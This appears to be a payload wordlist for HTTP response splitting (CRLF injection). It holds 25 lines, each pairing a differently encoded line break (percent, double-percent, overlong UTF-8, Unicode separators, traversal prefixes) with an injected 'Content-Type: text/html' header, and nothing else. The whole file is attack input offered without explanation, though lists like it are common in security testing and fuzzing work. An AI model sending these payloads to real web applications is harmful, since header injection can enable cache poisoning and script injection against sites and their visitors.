%0aContent-Type:%20text/html
%0dContent-Type:%20text/html
%%0a0aContent-Type:%20text/html
%0d%0aContent-Type:%20text/html
%0d%0a%0d%0aContent-Type:%20text/html
%23%0aContent-Type:%20text/html
%23%0dContent-Type:%20text/html
%23%0d%0aContent-Type:%20text/html
%25%30%61Content-Type:%20text/html
%25%30aContent-Type:%20text/html
%250aContent-Type:%20text/html
%25250aContent-Type:%20text/html
%2F..%0d%0aContent-Type:%20text/html
%2e%2e%2f%0d%0aContent-Type:%20text/html
%2f%2e%2e%0d%0aContent-Type:%20text/html
%3f%0dContent-Type:%20text/html
%3f%0d%0aContent-Type:%20text/html
%C0%8D%C0%8AContent-Type:%20text/html
%EA%A8%8AContent-Type:%20text/html
%c4%8d%c4%8aContent-Type:%20text/html
%u000aContent-Type:%20text/html
%u000d%u000aContent-Type:%20text/html
%u2028%u2029Content-Type:%20text/html
\u000d\u000aContent-Type:%20text/html
\u2028\u2029Content-Type:%20text/html
